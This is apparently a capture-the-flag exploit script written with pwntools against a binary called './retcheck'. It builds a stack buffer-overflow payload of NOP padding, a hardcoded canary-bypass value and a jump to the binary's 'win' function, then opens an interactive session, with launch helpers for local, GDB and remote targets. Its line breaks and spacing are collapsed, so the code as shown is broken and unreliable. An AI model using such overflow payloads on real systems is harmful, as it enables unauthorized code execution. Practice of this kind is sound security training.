from pwn import*# Allows you to switch between local/GDB/remote from terminaldefstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Find offset to EIP/RIP for buffer overflowsdeffind_ip(payload):# Launch process and send payload p =process(exe) p.sendlineafter('>', payload)# Wait for the process to crash p.wait()# Print out the address of EIP/RIP at the time of crashing ip_offset =cyclic_find(p.corefile.pc)# x86# ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64info('located EIP/RIP offset at {a}'.format(a=ip_offset))return ip_offset# Specify GDB script here (breakpoints etc)gdbscript ='''init-pwndbgcontinue'''.format(**locals())# Binary filenameexe ='./retcheck'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Change logging level to help with debugging (warning/info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================# Pass in pattern_size, get back EIP/RIP offsetoffset =400# Start programio =start()# Build the payloadpayload =flat([asm('nop') *408,0x401465, # canary (main+18)asm('nop') *8, elf.symbols.win])# Save the payload to filewrite('payload', payload)# Send the payloadio.sendlineafter('!', payload)# Got Shell?io.interactive()
